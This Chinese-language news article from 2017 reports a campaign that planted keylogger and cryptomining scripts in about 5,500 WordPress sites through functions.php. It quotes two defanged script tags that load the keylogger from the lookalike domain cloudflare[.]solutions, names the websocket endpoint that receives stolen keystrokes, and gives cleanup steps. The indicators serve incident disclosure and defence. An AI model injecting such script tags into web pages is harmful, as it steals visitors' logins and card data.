记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

全球5500个WordPress网站感染了。。。

2017-12-11 15:50

在将近5500个受感染的WordPress网站上发现了键盘记录器

将近5500个WordPress站点被恶意脚本所感染,这些脚本记录键盘敲击,有时还会使浏览器加载加密的程序。

恶意脚本从“cloudflare.solutions ”的域名加载,它与Cloudflare没有任何关系,恶意脚本能记录用户在表单字段内输入的任何内容。

该脚本加载在站点的前端和后端,这意味着当登录到站点的管理面板时,它还可以记录用户名和密码。

当左边的脚本在前端运行时,也很危险。在大多数WordPress网站上,唯一可以窃取用户数据的地方是评论栏,一些WordPress网站被配置为在应用商店上配置,在这些实例中,攻击者可以记录信用卡数据和个人用户详细信息。

这些事件大多发生是因为黑客通过各种手段入侵WordPress站点,并将恶意脚本隐藏在函数内,php是所有WordPress主题的标准文件。

攻击者自4月以来一直处于活跃状态

这些攻击并不新,在cloudflare.solutions上,安全人员跟踪了至少三个不同的恶意脚本。

第一个攻击发生在四月,攻击者使用恶意的JavaScript文件在被攻击的网站上嵌入横幅广告。

到了11月,这个组织改变了策略,并将恶意脚本伪装成伪jQuery和谷歌分析JavaScript文件,而这些JavaScript文件实际上是对浏览器中加密货币的一种拷贝。截至11月22日,该活动在1833个网站上被发现。

在最近的一系列攻击中,安全人员也检测到,黑客已经保留了加密脚本,但也添加了键盘记录器组件。

恶意脚本在将近5500个WordPress站点上运行

PublicWWW报道,这个恶意的脚本版本目前活跃在5496个网站上,大多数排名在Alexa前20万。

已知装载keylogger(键盘记录器)的两个恶意脚本是:

< script type=’text/javascript’ src=’hxxp://cloudflare[.]solutions/ajax/libs/reconnecting-websocket/1.0.0/reconnecting-websocket.js’ >< /script >

< script type=’text/javascript’ src=’hxxp://cloudflare[.]solutions/ajax/libs/cors/cors.js’ >< /script >

被盗数据被发送到 wss://cloudflare[.]solutions:8085端口

安全专家为那些在cloudflare.solutions上发现脚本的用户提供解决方案。

正如我们已经提到的,恶意代码驻留在function.php文件中,你应该删除add_js_scripts函数和所有提到add_js_scriptsadd_action语句。考虑到这个恶意软件的键盘记录功能,你应该考虑所有的WordPress密码都被破坏了,所以下一个步骤是修改密码(实际上,在任何网站黑客攻击之后,它都是非常推荐的),别忘了检查你的网站是否有其他感染。


知识来源: www.mottoin.com/108157.html

阅读:185473 | 评论:0 | 标签:技术控 漏洞分析

想收藏或者和大家分享这篇好文章→复制链接地址

“全球5500个WordPress网站感染了。。。”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

❤人人都能成为掌握黑客技术的英雄⛄️

ADS

标签云